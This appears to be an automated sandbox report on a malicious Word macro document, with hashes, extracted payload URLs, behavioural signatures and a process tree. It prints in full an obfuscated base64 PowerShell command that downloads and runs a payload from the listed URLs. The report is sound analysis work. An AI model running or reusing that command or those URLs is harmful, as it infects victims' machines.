Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21/09/2024, 00:27
Behavioral task
behavioral1
Sample
eebab40d2b32d50ddb36e3027f5d271d_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eebab40d2b32d50ddb36e3027f5d271d_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
eebab40d2b32d50ddb36e3027f5d271d_JaffaCakes118.doc
-
Size
156KB
-
MD5
eebab40d2b32d50ddb36e3027f5d271d
-
SHA1
9332211794dad4cb7dd0134813257c48ff9d5e37
-
SHA256
46b505ec3ab5e99510427ccb7e0658520124ad02797627777babb13d78defa75
-
SHA512
dd4147a75532c936b49d2f39540eb32fb6a027e92d0fb8f1c070223c4797eb0f4f1a0644a54c45ff087b24104dd778ad7576ba0d4ba04aa3dd30d800f8119b2d
-
SSDEEP
1536:IA3Aerdi1Ir77zOH98Wj2gpngB+a932eRz/C3Q:prfrzOH98ipgrV63Q
Malware Config
Extracted
http://belhao.com/wp-includes/gg/
http://badacareer.com/5f2o/hN/
http://siili.net/wp-admin/dnE/
https://sulselekspres.com/TEST777/a/
http://nouralanwar.com/cgfo/k/
https://povedavicedo.com/wp-admin/E5/
https://shoyannutrition.com/wp-includes/kn/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2236 2900 powershell.exe 31 -
Blocklisted process makes network request 11 IoCs
flow pid Process 5 2236 powershell.exe 10 2236 powershell.exe 12 2236 powershell.exe 13 2236 powershell.exe 15 2236 powershell.exe 16 2236 powershell.exe 17 2236 powershell.exe 19 2236 powershell.exe 20 2236 powershell.exe 22 2236 powershell.exe 23 2236 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\TypeLib\{57DF1A26-7087-4CF6-BA59-847419AF814E} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{57DF1A26-7087-4CF6-BA59-847419AF814E}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\TypeLib\{57DF1A26-7087-4CF6-BA59-847419AF814E}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\TypeLib\{57DF1A26-7087-4CF6-BA59-847419AF814E}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\TypeLib\{57DF1A26-7087-4CF6-BA59-847419AF814E}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2512 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2236 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2512 WINWORD.EXE 2512 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2512 wrote to memory of 760 2512 WINWORD.EXE 35 PID 2512 wrote to memory of 760 2512 WINWORD.EXE 35 PID 2512 wrote to memory of 760 2512 WINWORD.EXE 35 PID 2512 wrote to memory of 760 2512 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eebab40d2b32d50ddb36e3027f5d271d_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABYAGsAbwBvAGgAbABwAD0AKAAnAE4AJwArACcAZAAnACsAKAAnADAAYQByACcAKwAnAGMAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAcgBQAHIAbwBGAEkAbABlAFwAawA4AEgAOAA5AFgAcwBcAEsAYwBGADUAWQBGADEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAEMAYABVAGAAUgBgAEkAdAB5AHAAUgBvAHQAbwBjAG8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAsACAAdAAnACsAJwBsAHMAMQAxACcAKQArACgAJwAsACcAKwAnACAAdABsAHMAJwApACkAOwAkAEoAMABoAF8ANQAzAG4AIAA9ACAAKAAnAE0AJwArACgAJwBlAG4AbwAnACsAJwA5ADMAJwApACsAKAAnAGUAZgAnACsAJwBkACcAKQApADsAJABNAHQAMwBtAHIAaABpAD0AKAAnAEMAJwArACgAJwB1ACcAKwAnAG4AMAAnACsAJwBtAGQAcwAnACkAKQA7ACQAVQB2AGQANwB2ADgAZwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAJwArACcAfQAnACsAKAAnAEsAJwArACcAOABoACcAKQArACcAOAA5AHgAcwB7ADAAJwArACcAfQBLAGMAZgA1AHkAZgAxAHsAMAAnACsAJwB9ACcAKQAgACAALQBGACAAIABbAEMAaABBAFIAXQA5ADIAKQArACQASgAwAGgAXwA1ADMAbgArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEoANQB6AHIAMgBtAHcAPQAoACgAJwBKAHQAJwArACcANAAnACkAKwAnAGwAJwArACgAJwBpACcAKwAnAGYAZgAnACkAKQA7ACQASAB3AG0AZwBfAGsAaAA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAGwAaQBFAG4AVAA7ACQAQQB6AGkAbABfAHkAYwA9ACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAA6ACcAKwAoACcALwAvAGIAJwArACcAZQBsAGgAJwArACcAYQBvACcAKwAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtACcAKwAnAGkAJwArACgAJwBuAGMAbAB1ACcAKwAnAGQAJwApACsAJwBlAHMAJwArACgAJwAvAGcAZwAnACsAJwAvACoAaAAnACsAJwB0AHQAcAA6ACcAKQArACcALwAvACcAKwAnAGIAYQAnACsAJwBkAGEAJwArACcAYwAnACsAKAAnAGEAcgBlACcAKwAnAGUAcgAnACkAKwAoACcALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwA1AGYAMgBvACcAKwAnAC8AJwArACcAaAAnACkAKwAnAE4AJwArACcALwAqACcAKwAnAGgAJwArACcAdAB0ACcAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAnAHMAJwArACcAaQBpACcAKwAnAGwAJwArACgAJwBpACcAKwAnAC4AbgAnACkAKwAoACcAZQAnACsAJwB0AC8AdwBwACcAKQArACcALQAnACsAKAAnAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwBkAG4ARQAnACsAJwAvACcAKwAnACoAaAB0AHQAcABzACcAKQArACgAJwA6AC8ALwBzAHUAbABzAGUAJwArACcAbABlAGsAcwAnACsAJwBwAHIAJwArACcAZQAnACkAKwAnAHMALgAnACsAKAAnAGMAbwBtACcAKwAnAC8AVABFAFMAVAA3ACcAKwAnADcANwAnACkAKwAnAC8AJwArACgAJwBhACcAKwAnAC8AKgBoACcAKQArACgAJwB0AHQAJwArACcAcAA6ACcAKQArACcALwAvACcAKwAnAG4AJwArACgAJwBvACcAKwAnAHUAcgBhACcAKQArACgAJwBsAGEAbgB3ACcAKwAnAGEAcgAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAYwAnACsAKAAnAGcAZgBvACcAKwAnAC8AawAvACcAKQArACcAKgAnACsAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACsAKAAnAHMAOgAvACcAKwAnAC8AcAAnACkAKwAnAG8AJwArACgAJwB2AGUAJwArACcAZABhACcAKQArACcAdgAnACsAJwBpACcAKwAnAGMAJwArACgAJwBlAGQAJwArACcAbwAuAGMAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAtAGEAZABtACcAKwAnAGkAJwArACcAbgAvAEUAJwApACsAJwA1AC8AJwArACgAJwAqAGgAJwArACcAdAAnACkAKwAoACcAdAAnACsAJwBwAHMAOgAnACkAKwAnAC8AJwArACgAJwAvACcAKwAnAHMAaABvACcAKQArACgAJwB5AGEAbgAnACsAJwBuAHUAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACgAJwB0AGkAJwArACcAbwBuACcAKQArACcALgBjACcAKwAnAG8AbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGkAbgAnACsAJwBjAGwAJwArACcAdQBkAGUAcwAnACkAKwAnAC8AJwArACgAJwBrACcAKwAnAG4ALwAnACkAKQAuACIAUwBQAGAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGwANQA4AG0AaAB3AD0AKAAoACcAVQBwAF8AOQByACcAKwAnAHMAJwApACsAJwA0ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFAANQB5ADMAbABmAHoAIABpAG4AIAAkAEEAegBpAGwAXwB5AGMAKQB7AHQAcgB5AHsAJABIAHcAbQBnAF8AawBoAC4AIgBkAGAATwBXAGAATgBgAGwATwBBAGQARgBJAEwAZQAiACgAJABQADUAeQAzAGwAZgB6ACwAIAAkAFUAdgBkADcAdgA4AGcAKQA7ACQAWAA2AG8AawByAHgAZgA9ACgAJwBYAHEAJwArACcAXwAnACsAKAAnADAAcAA4ACcAKwAnADUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVQB2AGQANwB2ADgAZwApAC4AIgBsAEUAYABOAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADgANwAzACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAFUAdgBkADcAdgA4AGcAKQA7ACQARAB5AGEAagB3ADIAZwA9ACgAJwBZAHoAJwArACcAbAAnACsAKAAnAG0AeQA1ACcAKwAnADYAJwApACkAOwBiAHIAZQBhAGsAOwAkAE4AcABuADIANgAzAHkAPQAoACgAJwBSACcAKwAnAF8AOAAnACkAKwAnAGkAJwArACgAJwB5AG0AJwArACcANwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgB0AG0ANQAzAF8AbAA9ACgAKAAnAEYAJwArACcAYwB0ACcAKQArACgAJwA5ADUAJwArACcANQAnACkAKwAnAGkAJwApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD50ceee4de3578ed9485c0a357fe96da84
SHA1b7ed7556daa26b40ad096aec96acaa047cfe9260
SHA2564d60eadde1fd4b04b17ca9971f3f2897a9765cb42a81cafecf3e5b58b8fa9c64
SHA512900d9639a713e14f81e731e4b05cb224501c2873ba8b94037a95b754c5c206652e214fd8b23e10ad1afec692927ecb45868b06085142d67fcc2d78af29095d61